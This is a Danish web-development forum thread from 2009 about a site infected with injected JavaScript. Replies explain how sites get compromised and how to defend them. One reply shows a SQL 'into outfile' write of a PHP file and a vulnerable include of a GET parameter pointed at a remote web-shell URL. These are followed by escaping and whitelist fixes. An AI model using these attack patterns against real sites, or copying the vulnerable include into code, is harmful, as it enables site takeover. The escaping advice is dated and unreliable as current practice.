php - Virus - Udvikleren.dk - Programmering, webdesign og grafik

Tags: php

Bruger #14015 @ 05.06.09 12:56

Hej Udviklere.

Jeg har haft virus på min hjemmeside i langtid nu, men den kan bare ikke fjernes.. Google brugere får vist en advarselsside når de går der ind. I bunden af min side er der et lille javascript som ikke selv står i selve mine koder (altså, den inkluderede fil: bund.php), så jeg ved ikke hvordan jeg kan få den fjernet.

Så jeg ville høre om jeg kunne få nogen til at hjælpe mig med at fjerne den, evt. mod betaling hvis i ønsker.

Og så nogle tips til hvordan man undgår at ens hjemmeside bliver injected af sådanne javascripts?

Muligvis et sikkerhedshul på mit CMS-System.

Tak!!

Bruger #14855 @ 05.06.09 15:37

Mattias Fjellvang, kan andbefale du tager et tjek af dit cms (vis dit website er så nødvendigt) at tage http://www.hackavoid.dk/KompletTest.aspx en test hvor du bliver "hacket" og hvor du derefter får en besked hvor ens sikkerhedshuller er

Derefter vil jeg lige spørge? Hvordan kan man få adgang til dine filer?

Vil jeg aldrig forstå

Bruger #2695 @ 05.06.09 16:24

1.963

Mattias Fjellvang, kan andbefale du tager et tjek af dit cms (vis dit website er så nødvendigt) at tage http://www.hackavoid.dk/KompletTest.aspx en test hvor du bliver "hacket" og hvor du derefter får en besked hvor ens sikkerhedshuller er Derefter vil jeg lige spørge? Hvordan kan man få adgang til dine filer? Vil jeg aldrig forstå

Der findes mange angrebsmuligheder. SQL injection f.eks.

Kode

mysql> select "<?php phpinfo(); ?>" into outfile "/tmp/test.php";
Query OK, 1 row affected (0.00 sec)

mysql>

Remote includes:

Kode

include($_GET['action']);

...og så give 'http://www.xfocus.net/tools/200608/r57.txt' med som action.

Lokal file inclusion kan absolut også være et problem. Maaaang mange muligheder :-)

Bruger #14855 @ 06.06.09 12:08

Forstår stadig nada af det xD

Bruger #14855 @ 06.06.09 12:09

Mysql injection? Kan det ske lokalt

Bruger #2695 @ 07.06.09 09:12

1.963

Mysql injection? Kan det ske lokalt ?

Det kan ske alle steder fra hvis der er åbnet mulighed for det. Jeg viste bare et MySQL kald som skriver til en navngivet fil. Det kunne ligeså godt have sket gennem en web applikation.

Lidt afhængig af DBMS'en kan man også udføre kommandoer på maskinen.

Bruger #14855 @ 07.06.09 10:23

Forstår stadig nada men hvad gør de, og hvordan forhindre man det?

Bruger #2695 @ 07.06.09 19:19

1.963

Forstår stadig nada men hvad gør de, og hvordan forhindre man det?

Stol aldrig på dine brugere. Alt der kommer fra brugerne skal ses som mulige angreb.

Inden en bruger leveret parameter bruges i en databaseforespørgsel skal den igennem mysql_real_escape_string():

Kode

$sql = "SELECT * FROM users WHERE id='" . mysql_real_escape_string($_REQUEST['userid']) . "'";

Inden du inkluderer en fil baseret på bruger leveret indput skal du tjekke, om det er en legal streng:

Kode

$action_to_perform = isset($_REQUEST['action']) ? $_REQUEST['action'] : "default";

$action_files['default'] = "default.php";
$action_files['delete_user'] = "deluser.php";

if (!isset($action_files[$action_to_perform])) {
    $action_to_perform = "default";
}

include($action_files[$action_to_perform]);

...maaaange ting man skal tage højde for. Læs tykke bøger om det, men start her: http://www.owasp.org

Bruger #14015 @ 25.06.09 16:04

Hej Robert.
Og tak for dit svar.

De eneste includes jeg laver er: include("top.php"); (f.eks).

Har ikke nogen med $_GET..

Virus

Karma barometer (30 dage)

Modtaget

Givet

Favorit hos
Forum tråde
Artikler